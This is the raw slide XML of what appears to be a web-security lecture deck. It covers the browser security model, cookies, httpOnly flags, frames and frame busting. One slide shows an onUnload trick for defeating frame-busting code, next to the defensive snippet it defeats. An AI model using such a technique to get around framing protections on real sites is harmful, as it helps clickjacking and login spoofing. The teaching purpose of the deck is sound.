          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971801" y="1692275"/>
            <a:ext cx="1128713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5542" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3071813" y="1792288"/>
            <a:ext cx="914400" cy="60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>
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345543" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2530475"/>
            <a:ext cx="1524000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 1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5544" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2759075"/>
            <a:ext cx="1143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5545" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3714750" y="2525713"/>
            <a:ext cx="400050" cy="385762"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="252" y="81"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="249" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="147"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="252" h="243">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="252" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="243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345546" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="1616075"/>
            <a:ext cx="1219200" cy="1271588"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 2607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sz="2400">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345547" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="207327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345548" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5311879" y="1600200"/>
            <a:ext cx="7665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>
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345549" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="230187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345550" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="2362201"/>
            <a:ext cx="4800600" cy="1034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  <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP Header: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tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set-cookie:	NAME=VALUE ;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tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	httpOnly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345565" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="3898901"/>
            <a:ext cx="7265772" cy="2529923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 Cookie sent over HTTP(s),  but not accessible to scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  cannot be read via  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  Helps prevent cookie theft via XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> …  but does not stop most other risks of XSS bugs </a:t>
            </a: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63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 and frame busting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69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394" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2164140"/>
            <a:ext cx="7010400" cy="156966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algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> name=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>myframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>=“http://www.google.com/”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	       This text is ignored by most browsers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14673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Frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1467396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362200" y="1524000"/>
            <a:ext cx="8001000" cy="2028248"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Embed HTML documents in other documents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4673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022251"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5638800" y="3962143"/>
          <a:ext cx="4343400" cy="2193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Image" r:id="rId3" imgW="3873016" imgH="1955556" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Image" r:id="rId3" imgW="3873016" imgH="195555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962143"/>
                        <a:ext cx="4343400" cy="21930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78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739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418" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="7031" t="31662" r="77435" b="47917"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="3081338"/>
            <a:ext cx="2438400" cy="240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684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 Busting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1468420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8305800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Goal:  prevent web page from loading in a frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>example: opening login page in a frame will display</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>correct passmark image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Frame busting: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468421" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="4724827"/>
            <a:ext cx="507850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 dirty="0"/>
              <a:t>if   (top != self)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>top.location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>location.href</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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36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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frame Busting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146944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515600" cy="373841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Problem:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>OnUnload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> event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 smtClean="0"/>
              <a:t>Try this instead:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1469444" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2839420" y="2817169"/>
            <a:ext cx="6405215" cy="46166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/>
              <a:t>&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>onUnload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>cause_an_abort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>;)"&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1469445" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="4410943"/>
            <a:ext cx="5078506" cy="131112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 dirty="0"/>
              <a:t>if   (top != self)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>top.location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>location.href</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>else {  …  code of page here …}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32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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rendering content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Isolation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Navigation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security User Interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Frames and frame busting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Thanks and any questions?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920" y="2270634"/>
            <a:ext cx="1524000" cy="28860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119111" y="6436107"/>
            <a:ext cx="611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The materials of this lecture are mostly from Stanford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811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Five lectures on Web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Browser security model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The browser as an OS and execution platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Protocols, isolation, communication, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Web application security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Application pitfalls and defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Content security policies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Additional mechanisms for sandboxing and security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Authentication and session management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>How users authenticate to web sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Browser-server mechanisms for managing state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>HTTPS: goals and pitfalls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Network issues and browser protocol handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This two-week section could fill an entire course</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2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8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programming poll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Familiar with basic html?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Developed a web application using:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apache?                  PHP?                Ruby?        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Python?                   SQL?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript?              CSS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JSON?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Know about: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>NaCL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Webworkers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?    CSP?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WebView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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sz="2400" dirty="0"/>
              <a:t>Resource: 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http://www.w3schools.com/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6383547"/>
            <a:ext cx="10274060" cy="4744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Basic Web Security Model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0274060" y="6383547"/>
            <a:ext cx="1917940" cy="474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18F41-E0A9-4F72-861C-BE4AABE77BA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39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05/18/2007" val="LastModified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5396</TotalTime>
  <Words>2981</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>865</Paragraphs>
  <Slides>78</Slides>
  <Notes>24</Notes>
  <HiddenSlides>2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98" baseType="lpstr">
      <vt:lpstr>굴림</vt:lpstr>
      <vt:lpstr>Helvetica Neue Light</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>Monotype Sorts</vt:lpstr>
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>ヒラギノ角ゴ ProN W3</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Lucida Console</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>Image</vt:lpstr>
      <vt:lpstr>Computer Security and Cryptography</vt:lpstr>
      <vt:lpstr>Computer Security and Cryptography</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Web vs System vulnerabilities</vt:lpstr>
      <vt:lpstr>Reported Web Vulnerabilities "In the Wild"</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Web application vulnerabilities</vt:lpstr>
      <vt:lpstr>Five lectures on Web security</vt:lpstr>
      <vt:lpstr>Web programming poll</vt:lpstr>
      <vt:lpstr>Goals of web security</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Web Threat Models</vt:lpstr>
      <vt:lpstr>Malware attacker</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>HTTP </vt:lpstr>
      <vt:lpstr>URLs</vt:lpstr>
      <vt:lpstr>HTTP Request</vt:lpstr>
      <vt:lpstr>HTTP Response</vt:lpstr>
      <vt:lpstr>Rendering Content</vt:lpstr>
      <vt:lpstr>Rendering and events</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Document Object Model (DOM)</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Changing HTML using Script, DOM</vt:lpstr>
      <vt:lpstr>HTML Image Tags</vt:lpstr>
      <vt:lpstr>Image tag security issues</vt:lpstr>
      <vt:lpstr>JavaScript onError</vt:lpstr>
      <vt:lpstr>JavaScript timing</vt:lpstr>
      <vt:lpstr>Port scanning behind firewall</vt:lpstr>
      <vt:lpstr>Remote scripting</vt:lpstr>
      <vt:lpstr>Simple remote scripting example </vt:lpstr>
      <vt:lpstr>Isolation</vt:lpstr>
      <vt:lpstr>Frame and iFrame</vt:lpstr>
      <vt:lpstr>Windows Interact</vt:lpstr>
      <vt:lpstr>Analogy</vt:lpstr>
      <vt:lpstr>Policy Goals</vt:lpstr>
      <vt:lpstr>Browser security mechanism</vt:lpstr>
      <vt:lpstr>Components of browser security policy</vt:lpstr>
      <vt:lpstr>Library import excluded from SOP</vt:lpstr>
      <vt:lpstr>Domain Relaxation</vt:lpstr>
      <vt:lpstr>Additional mechanisms</vt:lpstr>
      <vt:lpstr>Communication</vt:lpstr>
      <vt:lpstr>window.postMessage</vt:lpstr>
      <vt:lpstr>postMessage syntax</vt:lpstr>
      <vt:lpstr>Why include “targetOrigin”?</vt:lpstr>
      <vt:lpstr>Navigation</vt:lpstr>
      <vt:lpstr>A Guninski Attack</vt:lpstr>
      <vt:lpstr>What should the policy be?</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Window Policy Anomaly</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Security User Interface</vt:lpstr>
      <vt:lpstr>Safe to type your password?</vt:lpstr>
      <vt:lpstr>Safe to type your password?</vt:lpstr>
      <vt:lpstr>Safe to type your password?</vt:lpstr>
      <vt:lpstr>Safe to type your password?</vt:lpstr>
      <vt:lpstr>Safe to type your password?</vt:lpstr>
      <vt:lpstr>Mixed Content:  HTTP and HTTPS</vt:lpstr>
      <vt:lpstr>Mixed Content:  HTTP and HTTPS</vt:lpstr>
      <vt:lpstr>Mixed content and network attacks</vt:lpstr>
      <vt:lpstr>Lock Icon 2.0</vt:lpstr>
      <vt:lpstr>Finally:   the status Bar</vt:lpstr>
      <vt:lpstr>Cookies:   client state</vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>Cookie authentication</vt:lpstr>
      <vt:lpstr>Cookie Security Policy</vt:lpstr>
      <vt:lpstr>Secure Cookies</vt:lpstr>
      <vt:lpstr>httpOnly Cookies</vt:lpstr>
      <vt:lpstr>Frames and frame busting</vt:lpstr>
      <vt:lpstr>Frames</vt:lpstr>
      <vt:lpstr>Frame Busting</vt:lpstr>
      <vt:lpstr>Better Frame Busting</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Thanks and any questions?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物联网与大数据</dc:title>
  <dc:creator>pebg zhou</dc:creator>
  <cp:lastModifiedBy>pebg zhou</cp:lastModifiedBy>
  <cp:revision>175</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-03-16T02:24:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-22T11:40:08Z</dcterms:modified>
</cp:coreProperties>
</file>